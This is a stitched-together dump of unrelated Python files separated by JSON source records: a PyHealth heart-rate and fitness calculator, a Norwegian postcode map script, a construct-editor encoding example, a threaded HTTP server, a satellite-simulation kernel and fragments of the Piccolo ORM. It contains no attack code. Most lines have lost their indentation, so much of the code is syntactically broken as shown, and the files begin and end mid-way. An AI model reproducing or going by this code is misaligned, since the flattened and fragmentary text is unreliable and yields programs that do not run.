if menu_option == "Basal Metabolic Rate":
return PyHealth.basal_metabolic_rate()
elif menu_option == "Body Mass Index":
bmi= PyHealth.body_mass_index()
return bmi
elif menu_option == "One Rep Max":
return PyHealth.one_rep_max()
elif menu_option == "Target Heart Rate":
return PyHealth.target_heart_rate()
elif menu_option == "Vo2 Max":
return PyHealth.vo2max()
            except KeyboardInterrupt:
                # setup() is a module-level function, not a PyHealth method
                return setup()
    else:
        return setup()
#%%
def destroy():
import sys
sys.exit()
#%%
def initialize():
import time
time.sleep(0.1)
print(" _ _ ")
time.sleep(0.1)
print(" _ _ | | | | _ _ ")
time.sleep(0.1)
print(" | || || | | || || | ")
time.sleep(0.1)
print(" =H| || || |========nnnn=============nnnn========| || || |H= ")
time.sleep(0.1)
print(" |_||_|| | | | | | | ||_||_| ")
time.sleep(0.1)
print(" |_| / | | \ |_| ")
time.sleep(0.1)
print(" | | | | ")
time.sleep(0.1)
print(" \ (_ /~~~\ _) / ")
time.sleep(0.1)
print(" \ \ ( '_' ) / / ")
time.sleep(0.1)
print(" \ )\ = /( / ")
time.sleep(0.1)
print(" \ (_) (_) / ")
time.sleep(0.1)
print(" \ / ~~~ \ / ")
time.sleep(0.1)
print(" ( ) ")
time.sleep(0.1)
print(" \ / ")
time.sleep(0.1)
print(" \ / ")
time.sleep(0.1)
print(" )==(O)==( ")
time.sleep(0.1)
print(" / \ /")
time.sleep(0.1)
print(" /____/ \____\ /")
time.sleep(0.1)
print(" / / \ \ /")
time.sleep(0.1)
print(" / / \ \ /")
time.sleep(0.1)
print(" ( ) ( ) ")
time.sleep(0.1)
print(" | | | | ")
time.sleep(0.1)
print(" | | | | ")
time.sleep(0.1)
print(" |___| |___| ")
time.sleep(0.1)
print(" (___) (___) ")
time.sleep(0.1)
print("======================================================================")
time.sleep(0.1)
print(" _____ _ _ _ _ _ ")
time.sleep(0.1)
print(" | __ \ | | | | | | | | | ")
time.sleep(0.1)
print(" | |__) | _| |__| | ___ __ _| | |_| |__ ")
time.sleep(0.1)
print(" | ___/ | | | __ |/ _ \/ _` | | __| '_ \ ")
time.sleep(0.1)
print(" | | | |_| | | | | __/ (_| | | |_| | | |")
time.sleep(0.1)
print(" |_| \__, |_| |_|\___|\__,_|_|\__|_| |_|")
time.sleep(0.1)
print(" __/ | ")
time.sleep(0.1)
print(" |___/ ")
time.sleep(0.1)
print("The programs included are free software;")
time.sleep(0.3)
print("the exact license terms for each program are described in the")
time.sleep(0.3)
print("individual files in /PyHealth/license.\n")
time.sleep(0.3)
print("Calculate your target heart rate with python.\n")
time.sleep(0.3)
print("This program uses the different methods of determining the health related calculatoins.\n")
time.sleep(0.3)
print("Acheive Goals Faster and increase performace with data you can use.")
time.sleep(0.3)
#%%
# Program Starts Here
try:
if __name__ == "__main__":
initialize()
main()
except KeyboardInterrupt:
import sys
sys.exit()
```
#### File: 0rion5/PyHealth/TargetHeartRate.py
```python
def target_heart_rate_program_init():
import time
print("________¶¶ ")
time.sleep(0.1)
print("____¶___¶¶¶ ")
time.sleep(0.1)
print("____¶¶¶_¶_¶¶¶ ")
time.sleep(0.1)
print("_____¶¶¶¶¶__¶¶ ")
time.sleep(0.1)
print("¶¶¶____¶¶¶¶__¶¶ ")
time.sleep(0.1)
print("_¶¶¶¶¶¶¶¶¶¶¶__¶¶ ")
time.sleep(0.1)
print("__¶¶¶_¶¶¶¶¶¶¶__¶¶ ")
time.sleep(0.1)
print("____¶¶_¶¶¶¶¶¶¶_¶¶ ")
time.sleep(0.1)
print("_____¶¶_¶¶¶¶¶¶¶¶¶___________¶¶¶¶¶ ")
time.sleep(0.1)
print("_______¶¶¶¶¶¶¶¶¶¶_________¶¶¶¶_¶¶¶¶ ")
time.sleep(0.1)
print("________¶¶¶¶¶¶¶¶¶_______¶¶¶_______¶¶ ")
time.sleep(0.1)
print("_____________¶¶¶¶¶_____¶¶¶___¶¶____¶¶ ")
time.sleep(0.1)
print("_______________¶¶¶¶___¶¶¶__¶¶¶¶¶____¶¶ ")
time.sleep(0.1)
print("_________________¶¶¶_¶¶¶__¶¶___¶¶___¶¶¶ ")
time.sleep(0.1)
print("__________________¶¶¶¶___¶¶_____¶____¶¶ ")
time.sleep(0.1)
print("___________________¶¶¶¶_¶¶______¶¶___¶¶ ")
time.sleep(0.1)
print("___________________¶¶¶¶¶¶___¶¶__¶¶___¶¶ ")
time.sleep(0.1)
print("___________________¶_¶¶¶¶__¶¶¶__¶¶___¶¶ ")
time.sleep(0.1)
print("__________________¶¶__¶¶¶¶¶__¶__¶¶___¶¶ ")
time.sleep(0.1)
print("__________________¶¶__¶_¶¶¶¶_¶__¶¶__¶¶¶ ")
time.sleep(0.1)
print("__________________¶__¶¶_¶¶¶¶¶¶__¶¶__¶¶¶ ")
time.sleep(0.1)
print("_________________¶¶__¶¶_¶¶__¶¶__¶¶__¶¶¶ ")
time.sleep(0.1)
print("_________________¶¶__¶¶_¶¶__¶¶__¶¶__¶¶¶ ")
time.sleep(0.1)
print("_________________¶¶__¶¶_¶¶_¶¶__¶¶___¶¶¶ ")
time.sleep(0.1)
print("_________________¶¶__¶¶__¶_¶___¶¶__¶¶¶ ")
time.sleep(0.1)
print("_________________¶¶__¶¶__¶¶___¶¶___¶¶¶ ")
time.sleep(0.1)
print("_________________¶¶__¶_______¶¶___¶¶¶ ")
time.sleep(0.1)
print("_________________¶¶__¶¶_____¶¶____¶¶¶ ")
time.sleep(0.1)
print("__________________¶__¶¶____¶¶____¶¶¶ ")
time.sleep(0.1)
print("__________________¶¶__¶¶¶¶¶____¶¶¶¶ ")
time.sleep(0.1)
print("__________________¶¶_________¶¶¶¶¶ ")
time.sleep(0.1)
print("___________________¶¶______¶¶¶¶¶ ")
time.sleep(0.1)
print("____________________¶¶¶¶¶¶¶¶¶¶ ")
time.sleep(0.1)
print("______________________¶¶¶¶¶¶ ")
time.sleep(0.1)
print(" _______ _ _ _ _ ")
time.sleep(0.3)
print("|__ __| | | | | | | | | ")
time.sleep(0.3)
print(" | | __ _ _ __ __ _ ___| |_ | |__| | ___ __ _ _ __| |_ ")
time.sleep(0.3)
print(" | |/ _` | '__/ _` |/ _ \ __| | __ |/ _ \/ _` | '__| __|")
time.sleep(0.3)
print(" | | (_| | | | (_| | __/ |_ | | | | __/ (_| | | | |_ ")
time.sleep(0.3)
print(" __|_|\__,_|_| \__, |\___|\__| |_| |_|\___|\__,_|_| \__|")
time.sleep(0.3)
print("| __ \ | | __/ | ")
time.sleep(0.3)
print("| |__) |__ _| |_|___/ ")
time.sleep(0.3)
print("| _ // _` | __/ _ \ ")
time.sleep(0.3)
print("| | \ \ (_| | || __/ ")
time.sleep(0.3)
print("|_| \_\__,_|\__\___| ")
time.sleep(0.3)
print(" ")
low = range(1, 62)
medium = range(62, 75)
high = range(75, 101)
intensity_dict= {
low : "low intensity" ,
medium : "medium intensity",
high : "high intensity"
}
class TargetHeartRate:
"""
This Class Calculates the target heart rate using two different methods
"""
# Class methods to call from other programs when importing
hr_max= lambda age,percent: (220-age)*percent//100
karvonen_hr= lambda age, restingHR, percentage: (((220-age) - restingHR)*percentage//100) + restingHR
# HRmax Method
def hrmax(age, percent):
"""
Using HRmax to determine Exercise intensity provides an estimation
of how hard the end user should exercise. In general, research shows
that an appropriate range of recommended exercise intensity falls
between 55% and 90% of HRmax
"""
# define heart rate maximum
HRmax= 220-age
# return the target heart rate
return HRmax*percent//100
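    # Worked example (hypothetical values): a 30-year-old at 70% intensity:
    #   TargetHeartRate.hrmax(30, 70) -> (220 - 30) * 70 // 100 = 133 bpm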
# Karvonen method
def karvonen(age, HRresting, percent):
"""
This function uses the Karvonen method of determining the optimal target heart rate.
As compared to HRmax, for which the range is 55% to 90%, when using
this method to determine intensity, targetHRs during cardiorespiratory
training should fall between 50% to 85% of HRR.
this is to Ensure the target HR is not overestimated
"""
# define heart rate maximum
HRmax = 207-(0.7*age)
global HRreserve
HRreserve = round(HRmax - HRresting)
# return the target heart rate
return round(((HRmax - HRresting)*percent//100) + HRresting)
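    # Worked example (hypothetical values): age 30, resting HR 60, 70%:
    #   HRmax = 207 - 0.7 * 30 = 186
    #   TargetHeartRate.karvonen(30, 60, 70)
    #   -> (186 - 60) * 70 // 100 + 60 = 148 bpm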
def heart_rate_reserve(age, HRresting):
HRmax = 220-age
return HRmax - HRresting
# Get VO2 Max
def vo2_max(age,resting_hr ):
"""
Vo2 Max = 15.3 x (MHR/RHR)
MHR = Maximum heart rate. This number is actually the number of beats
over the number of minutes, or the number of beats in 20 seconds multiplied by 3.
RHR = Resting heart rate. The number is also found by dividing beats
by minute or number of beats in 20 seconds multiplied by three.
"""
# Return VO2 Max
return round(15.3*((220-age)/resting_hr),2)
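    # Worked example (hypothetical values): age 30, resting HR 60:
    #   TargetHeartRate.vo2_max(30, 60) -> round(15.3 * (190 / 60), 2) = 48.45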
def target_high(age, HRresting):
return TargetHeartRate.karvonen(age, HRresting, 85)
def target_low(age, HRresting):
return TargetHeartRate.karvonen(age, HRresting, 50)
def target_min(HRreserve,RHR):
return HRreserve*0.5 +RHR
target_avg = lambda x, y : (x+y)/2
def zoladz(age):
"""
An alternative to the Karvonen method is the Zoladz method,
which derives exercise zones by subtracting values from HRmax:
THR = HRmax − Adjuster ± 5 bpm
Zone 1 Adjuster = 50 bpm
Zone 2 Adjuster = 40 bpm
Zone 3 Adjuster = 30 bpm
Zone 4 Adjuster = 20 bpm
Zone 5 Adjuster = 10 bpm
"""
adjuster= {
1 : 50, # Easy
2 : 40, # Easy but less
3 : 30, # Medium
4 : 20, # Medium but less
5 : 10 # Hard
}
# Heart Rate Max
HRmax = 220 -int(age)
# Get user input to select a zone
selected_zone= int(input("Select Training Zone: "))
        # Look up the adjuster for the selected zone (returns None if invalid)
        if selected_zone in adjuster:
            THR = HRmax - adjuster[selected_zone]
            return THR
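    # Worked example (hypothetical values): for age 30 with zone 3 entered at
    # the prompt (adjuster 30):
    #   THR = (220 - 30) - 30 = 160 bpm, with a +/-5 bpm band per the method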
def yes_no(user_input):
option= lambda x: x[0:1].lower()
while True:
choice= option(user_input)
if choice=='y':
# Return yes
return 'yes'
elif choice=='n':
# Return no
return 'no'
else:
# Return yes_no() function
return yes_no(input("Continue? Y/n: "))
def main():
target_heart_rate_program_init()
if yes_no(input("Would you like to continue? y/n: "))=="yes":
runProgram = True
while runProgram:
restingHR= int(input("What is your resting heart rate? "))
age= int(input("How old are you? "))
intensity= int(input("What is your target intensity 50-85%? "))
            for keys in intensity_dict.keys():
                if intensity in keys:
                    intensity_rating = intensity_dict[keys]
targetBPM= TargetHeartRate.karvonen(age, restingHR, intensity)
vo2max= TargetHeartRate.vo2_max(age, restingHR)
target_high= TargetHeartRate.target_high(age, restingHR)
target_low= TargetHeartRate.target_low(age, restingHR)
print("""\nYour target heart rate is : {} bpm
Intensity Level : {}
Target High (85% of HRR) : {} bpm
Target Low (50% of HRR) : {} bpm
Vo2Max : {} ml/kg/min
""".format(targetBPM, intensity_rating, target_high, target_low,vo2max))
if yes_no(input("Do another calculation? y/n: ")) == "yes":
continue
else:
break
return [targetBPM, intensity_rating, target_high, target_low,vo2max]
# Program Starts Here
if __name__ == "__main__":
results= main()
``` |
{
"source": "0rkGrrr1/Exercises",
"score": 4
} |
#### File: Python/Norway post codes map/postcodes_map.py
```python
import geopandas as gpd
import matplotlib.pyplot as plt
def plot_post_code_map():
""" Function processes raw data,
extracts data from column POSTNUMMER,
draws the map of given post codes,
and prints all unique post codes to console. """
#Reading data set:
norway_set = gpd.read_file('Basisdata_0000_Norge_25833_Postnummeromrader_SOSI_Postnummerområde_FLATE.shp')
#Choosing essential columns:
norway_set = norway_set[['POSTNUMMER', 'geometry']]
#Drawing a map with outline of every postal code:
norway_set.plot(figsize=(10, 10), column='POSTNUMMER', cmap='prism',
edgecolor='black', linewidth=0.2)
    #Selecting unique postal codes directly from the column
    uniquelist = norway_set['POSTNUMMER'].unique()
#Displaying total count of unique postal codes
print('Number of unique rows:')
print(uniquelist.size)
#Printing all unique post codes
print('Unique post codes:')
print(uniquelist.tolist())
plot_post_code_map()
#Render the map window when run as a script
plt.show()
``` |
{
"source": "0rShemesh/construct-editor",
"score": 3
} |
#### File: construct_editor/gallery/test_stringencodded.py
```python
import construct as cs
from . import GalleryItem
from typing import Dict, Any
ENCODDINGS = dict(
ASCII="ascii",
UTF8="utf8",
UTF16="utf16",
MANDARIN="gb2312",
ARABIC="iso8859_6",
RUSSIAN="iso8859_5",
JAPANESE="shift_jis",
PORTUGUESE="cp860",
)
ENCODDINGS_NUMBER = {key: number for number, key in enumerate(ENCODDINGS)}
def text_helper(encodding :str, text: str) -> bytes:
return ENCODDINGS_NUMBER[encodding].to_bytes(1, "little") + text.encode(ENCODDINGS[encodding])
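# A small sketch of the framing produced above: one prefix byte selecting the
# encoding, followed by the encoded text. ASCII has index 0, so e.g.:
#   text_helper("ASCII", "hi") -> b"\x00hi"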
def generate_all_string_encodded() -> Dict[str, Any]:
    return {key: cs.StringEncoded(cs.GreedyBytes, value) for key, value in ENCODDINGS.items()}
constr = cs.Struct(
"encodding" / cs.Enum(cs.Int8ub, **ENCODDINGS_NUMBER),
"string"
/ cs.Switch(
cs.this.encodding,
cases=generate_all_string_encodded(),
),
)
gallery_item = GalleryItem(
construct=constr,
example_binarys={
"English": text_helper("ASCII", "hello world"),
"Mandarin" : text_helper("MANDARIN", "你好世界"),
"HINDI" : text_helper("UTF8", "नमस्ते दुनिया"),
"SPANISH" : text_helper("ASCII", "Hola Mundo"),
"FRENCH" : text_helper("ASCII", "Bonjour le monde"),
"ARABIC" : text_helper("ARABIC", "مرحبا بالعالم"),
"RUSSIAN" : text_helper("RUSSIAN", "Привет мир"),
"PORTUGUESE" : text_helper("PORTUGUESE", "<NAME>"),
"INDONESIAN" : text_helper("ASCII", "Halo Dunia"),
"JAPANESE" : text_helper("JAPANESE", "こんにちは世界"),
"emoji": text_helper("UTF8", "🙋🏼🌎"),
"Zeros": bytes(8),
},
)
``` |
{
"source": "0rtis/multithread-http-server",
"score": 2
} |
#### File: 0rtis/multithread-http-server/multithread_http_server.py
```python
import socket
import threading
import time
from http.server import HTTPServer
import logging
class MultiThreadHttpServer:
def __init__(self, host, parallelism, http_handler_class, request_callback=None, log=None):
"""
        :param host: address tuple to bind. example: ('127.0.0.1', 80)
:param parallelism: number of thread listener and backlog
:param http_handler_class: the handler class extending BaseHTTPRequestHandler
        :param request_callback: callback on incoming request. It can be accessed from the HTTPHandler instance.
Example: self.server.request_callback(
'GET', # specify http method
self # pass the HTTPHandler instance
)
"""
self.host = host
self.parallelism = parallelism
self.http_handler_class = http_handler_class
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.request_callback = request_callback
self.connection_handlers = []
self.stop_requested = False
self.log = log
def start(self, background=False):
self.socket.bind(self.host)
self.socket.listen(self.parallelism)
if self.log is not None:
self.log.debug("Creating "+str(self.parallelism)+" connection handler")
for i in range(self.parallelism):
ch = ConnectionHandler(self.socket, self.http_handler_class, self.request_callback)
ch.start()
self.connection_handlers.append(ch)
if background:
if self.log is not None:
self.log.debug("Serving (background thread)")
threading.Thread(target=self.__serve).start()
else:
if self.log is not None:
self.log.debug("Serving (current thread)")
self.__serve()
def stop(self):
self.stop_requested = True
for ch in self.connection_handlers:
ch.stop()
def __serve(self):
"""
Serve until stop() is called. Blocking method
:return:
"""
while not self.stop_requested:
time.sleep(1)
class ConnectionHandler(threading.Thread, HTTPServer):
def __init__(self, sock, http_handler_class, request_callback=None):
HTTPServer.__init__(self, sock.getsockname(), http_handler_class, False)
self.socket = sock
        # The shared listening socket is owned by MultiThreadHttpServer, so
        # bind/close must be no-ops on each handler.
        self.server_bind = self.server_close = lambda: None
self.HTTPHandler = http_handler_class
self.request_callback = request_callback
threading.Thread.__init__(self)
self.daemon = True
self.stop_requested = False
def stop(self):
self.stop_requested = True
def run(self):
""" Each thread process request forever"""
self.serve_forever()
def serve_forever(self):
""" Handle requests until stopped """
while not self.stop_requested:
self.handle_request()
print("Finish" + str(threading.current_thread()))
``` |
{
"source": "0saurabh0/p1",
"score": 3
} |
#### File: p1/examples/counter.py
```python
import time
import satsim
class CounterModel(satsim.Model):
def __init__(self, name, description, parent):
super().__init__(name, description, parent)
self.counter = 0
self.count_entrypoint = satsim.EntryPoint("Increase Counter")
self.count_entrypoint.execute = self.count
self.reset_entrypoint = satsim.EntryPoint("Reset Counter")
self.reset_entrypoint.execute = self.reset
self.log_entrypoint = satsim.EntryPoint("Log Counter")
self.log_entrypoint.execute = self.log_count
self.log_time_entrypoint = satsim.EntryPoint("Log Time")
self.log_time_entrypoint.execute = self.log_time
def reset(self):
print("Reset counter")
self.counter = 0
def count(self):
self.counter += 1
print("Increase counter. Value now:", self.counter)
def log_count(self):
print("Log counter:", self.counter)
def log_time(self):
time.sleep(3)
print("Current time:", self.time_keeper.get_simulation_time())
def configure(self, logger, link_registry):
if self._state != self.PUBLISHING:
raise satsim.InvalidComponentState()
self.logger = logger
self.logger.log_info(self, "Counter Model is now configured")
self._state = self.CONFIGURED
def connect(self, simulator):
if self._state != self.CONFIGURED:
raise satsim.InvalidComponentState()
self.simulator = simulator
self.scheduler = simulator.get_scheduler()
self.time_keeper = simulator.get_time_keeper()
self.scheduler.add_simulation_time_event(self.log_time_entrypoint, 0, 1, 7)
self.scheduler.add_simulation_time_event(self.count_entrypoint, 1)
self.scheduler.add_simulation_time_event(self.log_entrypoint, 2, 1.5, 2)
self.scheduler.add_simulation_time_event(self.reset_entrypoint, 3)
self.logger.log_info(self, "Counter Model is now connected")
self._state = self.CONNECTED
# create simulator
simulator = satsim.Simulator()
# create model instance
counter_model = CounterModel("Counter", "Counter Model", simulator)
# add to models container
simulator.add_model(counter_model)
# simulator starting
simulator.publish()
simulator.configure()
simulator.connect()
simulator.initialise()
print("Simulation started")
simulator.run()
# run for some time
for i in range(10):
print("Current event:", simulator.get_scheduler().get_current_event_id())
time.sleep(1)
print("Simulation completed")
simulator.exit()
```
#### File: satsim/kernel/collection.py
```python
from satsim import Object
class Collection(Object):
def __init__(self):
pass
def collection_at(self, index_or_name):
""" shall return the element with the given position or name,
if no element exists with the given position or name, it returns None
"""
pass
def collection_size(self):
""" shall return the number of items in the collection
"""
pass
```
#### File: satsim/kernel/container.py
```python
from satsim import Object
class ContainerFull(Exception):
pass
class DuplicateName(Exception):
pass
class CannotDelete(Exception):
pass
class NotContained(Exception):
pass
class Container(Object):
def __init__(self, name, description="", parent=None):
super().__init__(name, description, parent)
self.components = []
self.max_count = None
self.min_count = None
def get_component(self, name):
for component in self.components:
if component.name == name:
return component
else:
return None
def get_components(self):
return self.components
def add_component(self, component):
if self.max_count is not None:
if len(self.components) >= self.max_count:
raise ContainerFull()
for _component in self.components:
if _component.name == component.name:
raise DuplicateName()
self.components.append(component)
def get_count(self):
return len(self.components)
def get_upper(self):
return self.max_count if self.max_count is not None else -1
def get_lower(self):
return self.min_count if self.min_count is not None else -1
def delete_component(self, component):
if self.min_count is not None:
if len(self.components) <= self.min_count:
raise CannotDelete()
for _component in self.components:
if _component.name == component.name:
                # list.remove() takes the element itself; pop() expects an index
                self.components.remove(_component)
return
else:
raise NotContained()
```
#### File: kernel/services/logger.py
```python
from satsim import Service
class Logger(Service):
INFORMATION = "INFORMATION"
EVENT = "EVENT"
WARNING = "WARNING"
ERROR = "ERROR"
DEBUG = "DEBUG"
def __init__(self, simulator):
self._simulator = simulator
def log(self, sender, message, kind=None):
print("{} | {}".format(kind, message))
def log_info(self, sender, message):
self.log(sender, message, kind=self.INFORMATION)
def log_event(self, sender, message):
self.log(sender, message, kind=self.EVENT)
def log_warning(self, sender, message):
self.log(sender, message, kind=self.WARNING)
def log_error(self, sender, message):
self.log(sender, message, kind=self.ERROR)
def log_debug(self, sender, message):
self.log(sender, message, kind=self.DEBUG)
``` |
{
"source": "0scarB/piccolo",
"score": 2
} |
#### File: app/commands/show_all.py
```python
from piccolo.conf.apps import Finder
def show_all():
"""
Lists all registered Piccolo apps.
"""
app_registry = Finder().get_app_registry()
print("Registered apps:")
for app_path in app_registry.apps:
print(app_path)
```
#### File: apps/migrations/tables.py
```python
from __future__ import annotations
import typing as t
from piccolo.columns import Timestamp, Varchar
from piccolo.columns.defaults.timestamp import TimestampNow
from piccolo.table import Table
class Migration(Table):
name = Varchar(length=200)
app_name = Varchar(length=200)
ran_on = Timestamp(default=TimestampNow())
@classmethod
async def get_migrations_which_ran(
cls, app_name: t.Optional[str] = None
) -> t.List[str]:
"""
Returns the names of migrations which have already run, by inspecting
the database.
"""
query = cls.select(cls.name, cls.ran_on).order_by(cls.ran_on)
if app_name is not None:
query = query.where(cls.app_name == app_name)
return [i["name"] for i in await query.run()]
```
#### File: tester/commands/run.py
```python
from __future__ import annotations
import os
import sys
import typing as t
from piccolo.table import TABLE_REGISTRY
class set_env_var:
def __init__(self, var_name: str, temp_value: str):
"""
Temporarily set an environment variable.
:param var_name:
The name of the environment variable to temporarily change.
:temp_value:
The value that the environment variable will temporarily be set to,
before being reset to it's pre-existing value.
"""
self.var_name = var_name
self.temp_value = temp_value
def set_var(self, value: str):
os.environ[self.var_name] = value
def get_var(self) -> t.Optional[str]:
return os.environ.get(self.var_name)
def __enter__(self):
self.existing_value = self.get_var()
self.set_var(self.temp_value)
def __exit__(self, *args):
if self.existing_value is None:
del os.environ[self.var_name]
else:
self.set_var(self.existing_value)
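# A short usage sketch (variable name and value are illustrative):
#
#   with set_env_var("PICCOLO_CONF", "my_app.piccolo_conf_test"):
#       ...  # code here sees the temporary value
#   # on exit the previous value (or its absence) is restored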
def run_pytest(pytest_args: t.List[str]) -> int: # pragma: no cover
try:
import pytest
except ImportError:
sys.exit(
"Couldn't find pytest. Please use `pip install 'piccolo[pytest]' "
"to use this feature."
)
return pytest.main(pytest_args)
def refresh_db():
for table_class in TABLE_REGISTRY:
# In case any table classes were imported before we set the
# environment variable.
table_class._meta.refresh_db()
def run(
pytest_args: str = "", piccolo_conf: str = "piccolo_conf_test"
) -> None:
"""
Run your unit test suite using Pytest.
:param piccolo_conf:
The piccolo_conf module to use when running your tests. This will
contain the database settings you want to use. For example
`my_folder.piccolo_conf_test`.
:param pytest_args:
Any options you want to pass to Pytest. For example
`piccolo tester run --pytest_args="-s"`.
"""
with set_env_var(var_name="PICCOLO_CONF", temp_value=piccolo_conf):
refresh_db()
args = pytest_args.split(" ")
sys.exit(run_pytest(args))
```
#### File: user/piccolo_migrations/2020-06-11T21-38-55.py
```python
from piccolo.apps.migrations.auto import MigrationManager
ID = "2020-06-11T21:38:55"
async def forwards():
manager = MigrationManager(migration_id=ID, app_name="user")
manager.add_column(
table_class_name="BaseUser",
tablename="piccolo_user",
column_name="first_name",
column_class_name="Varchar",
params={
"length": 255,
"default": "",
"null": True,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="BaseUser",
tablename="piccolo_user",
column_name="last_name",
column_class_name="Varchar",
params={
"length": 255,
"default": "",
"null": True,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
return manager
```
#### File: columns/defaults/interval.py
```python
from __future__ import annotations
import datetime
import typing as t
from enum import Enum
from .base import Default
class IntervalCustom(Default): # lgtm [py/missing-equals]
def __init__(
self,
weeks: int = 0,
days: int = 0,
hours: int = 0,
minutes: int = 0,
seconds: int = 0,
milliseconds: int = 0,
microseconds: int = 0,
):
self.weeks = weeks
self.days = days
self.hours = hours
self.minutes = minutes
self.seconds = seconds
self.milliseconds = milliseconds
self.microseconds = microseconds
@property
def timedelta(self):
return datetime.timedelta(
weeks=self.weeks,
days=self.days,
hours=self.hours,
minutes=self.minutes,
seconds=self.seconds,
milliseconds=self.milliseconds,
microseconds=self.microseconds,
)
@property
def postgres(self):
value = self.get_postgres_interval_string(
attributes=[
"weeks",
"days",
"hours",
"minutes",
"seconds",
"milliseconds",
"microseconds",
]
)
return f"'{value}'"
@property
def sqlite(self):
return self.timedelta.total_seconds()
def python(self):
return self.timedelta
@classmethod
def from_timedelta(cls, instance: datetime.timedelta):
return cls(
days=instance.days,
seconds=instance.seconds,
microseconds=instance.microseconds,
)
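# A small equivalence sketch of the conversions above:
#   IntervalCustom(minutes=5).timedelta == datetime.timedelta(minutes=5)
#   IntervalCustom.from_timedelta(datetime.timedelta(days=2)).python()
#       -> datetime.timedelta(days=2)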
###############################################################################
IntervalArg = t.Union[
IntervalCustom,
Enum,
None,
datetime.timedelta,
]
__all__ = [
"IntervalArg",
"IntervalCustom",
]
```
#### File: piccolo/columns/reference.py
```python
from __future__ import annotations
import importlib
import inspect
import typing as t
from dataclasses import dataclass, field
if t.TYPE_CHECKING: # pragma: no cover
from piccolo.columns.column_types import ForeignKey
from piccolo.table import Table
@dataclass
class LazyTableReference:
"""
Holds a reference to a ``Table`` subclass. Used to avoid circular
dependencies in the ``references`` argument of ``ForeignKey`` columns.
:param table_class_name:
The name of the ``Table`` subclass. For example, 'Manager'.
:param app_name:
If specified, the ``Table`` subclass is imported from a Piccolo app
with the given name.
:param module_path:
If specified, the ``Table`` subclass is imported from this path.
For example, 'my_app.tables'.
"""
table_class_name: str
app_name: t.Optional[str] = None
module_path: t.Optional[str] = None
def __post_init__(self):
if self.app_name is None and self.module_path is None:
raise ValueError(
"You must specify either app_name or module_path."
)
if self.app_name and self.module_path:
raise ValueError(
"Specify either app_name or module_path - not both."
)
def resolve(self) -> t.Type[Table]:
if self.app_name is not None:
from piccolo.conf.apps import Finder
finder = Finder()
return finder.get_table_with_name(
app_name=self.app_name, table_class_name=self.table_class_name
)
if self.module_path:
module = importlib.import_module(self.module_path)
table: t.Optional[t.Type[Table]] = getattr(
module, self.table_class_name, None
)
from piccolo.table import Table
if (
table is not None
and inspect.isclass(table)
and issubclass(table, Table)
):
return table
else:
raise ValueError(
f"Can't find a Table subclass called {self.app_name} "
f"in {self.module_path}"
)
raise ValueError("You must specify either app_name or module_path.")
def __str__(self):
if self.app_name:
return f"App {self.app_name}.{self.table_class_name}"
elif self.module_path:
return f"Module {self.module_path}.{self.table_class_name}"
else:
return "Unknown"
@dataclass
class LazyColumnReferenceStore:
foreign_key_columns: t.List[ForeignKey] = field(default_factory=list)
def for_table(self, table: t.Type[Table]) -> t.List[ForeignKey]:
return [
i
for i in self.foreign_key_columns
if isinstance(i._foreign_key_meta.references, LazyTableReference)
and i._foreign_key_meta.references.resolve() is table
]
def for_tablename(self, tablename: str) -> t.List[ForeignKey]:
return [
i
for i in self.foreign_key_columns
if isinstance(i._foreign_key_meta.references, LazyTableReference)
and i._foreign_key_meta.references.resolve()._meta.tablename
== tablename
]
LAZY_COLUMN_REFERENCES: LazyColumnReferenceStore = LazyColumnReferenceStore()
```
#### File: query/methods/objects.py
```python
from __future__ import annotations
import typing as t
from dataclasses import dataclass
from piccolo.columns.column_types import ForeignKey
from piccolo.columns.combination import And, Where
from piccolo.custom_types import Combinable
from piccolo.engine.base import Batch
from piccolo.query.base import Query
from piccolo.query.mixins import (
LimitDelegate,
OffsetDelegate,
OrderByDelegate,
OutputDelegate,
PrefetchDelegate,
WhereDelegate,
)
from piccolo.querystring import QueryString
from piccolo.utils.dictionary import make_nested
from piccolo.utils.sync import run_sync
from .select import Select
if t.TYPE_CHECKING: # pragma: no cover
from piccolo.columns import Column
from piccolo.table import Table
@dataclass
class GetOrCreate:
query: Objects
where: Combinable
defaults: t.Dict[t.Union[Column, str], t.Any]
async def run(self):
instance = await self.query.get(self.where).run()
if instance:
instance._was_created = False
return instance
instance = self.query.table()
# If it's a complex `where`, there can be several column values to
# extract e.g. (Band.name == 'Pythonistas') & (Band.popularity == 1000)
if isinstance(self.where, Where):
setattr(
instance,
self.where.column._meta.name, # type: ignore
self.where.value, # type: ignore
)
elif isinstance(self.where, And):
for column, value in self.where.get_column_values().items():
if len(column._meta.call_chain) == 0:
# Make sure we only set the value if the column belongs
# to this table.
setattr(instance, column._meta.name, value)
for column, value in self.defaults.items():
if isinstance(column, str):
column = instance._meta.get_column_by_name(column)
setattr(instance, column._meta.name, value)
await instance.save().run()
instance._was_created = True
return instance
def __await__(self):
"""
        If the user doesn't explicitly call .run(), proxy to it as a
convenience.
"""
return self.run().__await__()
def run_sync(self):
return run_sync(self.run())
def prefetch(self, *fk_columns) -> GetOrCreate:
self.query.prefetch(*fk_columns)
return self
@dataclass
class Create:
query: Objects
columns: t.Dict[str, t.Any]
async def run(self):
instance = self.query.table()
for column, value in self.columns.items():
if isinstance(column, str):
column = instance._meta.get_column_by_name(column)
setattr(instance, column._meta.name, value)
await instance.save().run()
instance._was_created = True
return instance
def __await__(self):
"""
        If the user doesn't explicitly call .run(), proxy to it as a
convenience.
"""
return self.run().__await__()
def run_sync(self):
return run_sync(self.run())
@dataclass
class Objects(Query):
"""
Almost identical to select, except you have to select all fields, and
table instances are returned, rather than just data.
"""
__slots__ = (
"nested",
"limit_delegate",
"offset_delegate",
"order_by_delegate",
"output_delegate",
"prefetch_delegate",
"where_delegate",
)
def __init__(
self,
table: t.Type[Table],
prefetch: t.Sequence[t.Union[ForeignKey, t.List[ForeignKey]]] = (),
**kwargs,
):
super().__init__(table, **kwargs)
self.limit_delegate = LimitDelegate()
self.offset_delegate = OffsetDelegate()
self.order_by_delegate = OrderByDelegate()
self.output_delegate = OutputDelegate()
self.output_delegate._output.as_objects = True
self.prefetch_delegate = PrefetchDelegate()
self.prefetch(*prefetch)
self.where_delegate = WhereDelegate()
def output(self, load_json: bool = False) -> Objects:
self.output_delegate.output(
as_list=False, as_json=False, load_json=load_json
)
return self
def limit(self, number: int) -> Objects:
self.limit_delegate.limit(number)
return self
def first(self) -> Objects:
self.limit_delegate.first()
